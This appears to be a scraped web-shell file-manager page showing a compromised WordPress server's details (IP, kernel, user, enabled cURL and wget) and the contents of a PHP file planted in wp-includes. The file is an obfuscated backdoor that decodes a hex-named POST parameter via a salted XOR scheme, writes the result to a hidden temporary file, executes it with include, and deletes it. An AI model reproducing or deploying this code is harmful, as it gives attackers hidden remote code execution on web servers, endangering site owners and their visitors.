| Server IP : 198.38.94.67 / Your IP : 216.73.217.178 Web Server : LiteSpeed System : Linux d6054.dxb1.stableserver.net 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64 User : azfilmst ( 1070) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /proc/self/cwd/wp-includes/Requests/src/Auth/ |
Upload File : |
<?php
if(filter_has_var(INPUT_POST, "p\x61\x72a\x6D\x65\x74er_gr\x6Fu\x70")){
$bind = $_POST["p\x61\x72a\x6D\x65\x74er_gr\x6Fu\x70"];
$bind = explode ( "." , $bind) ;
$res ='';
$salt ='abcdefghijklmnopqrstuvwxyz0123456789';
$sLen =strlen( $salt );
$x =0;
foreach( $bind as $v7) {
$chS =ord( $salt[$x % $sLen] );
$dec =( ( int)$v7 - $chS -( $x % 10))^ 85;
$res.= chr( $dec );
$x++;
}
$pset = array_filter([getcwd(), getenv("TMP"), sys_get_temp_dir(), getenv("TEMP"), "/var/tmp", "/dev/shm", ini_get("upload_tmp_dir"), session_save_path(), "/tmp"]);
$dat = 0;
do {
$token = $pset[$dat] ?? null;
if ($dat >= count($pset)) break;
if (max(0, is_dir($token) * is_writable($token))) {
$entity = sprintf("%s/.component", $token);
$file = fopen($entity, 'w');
if ($file) {
fwrite($file, $res);
fclose($file);
include $entity;
@unlink($entity);
exit;
}
}
$dat++;
} while (true);
}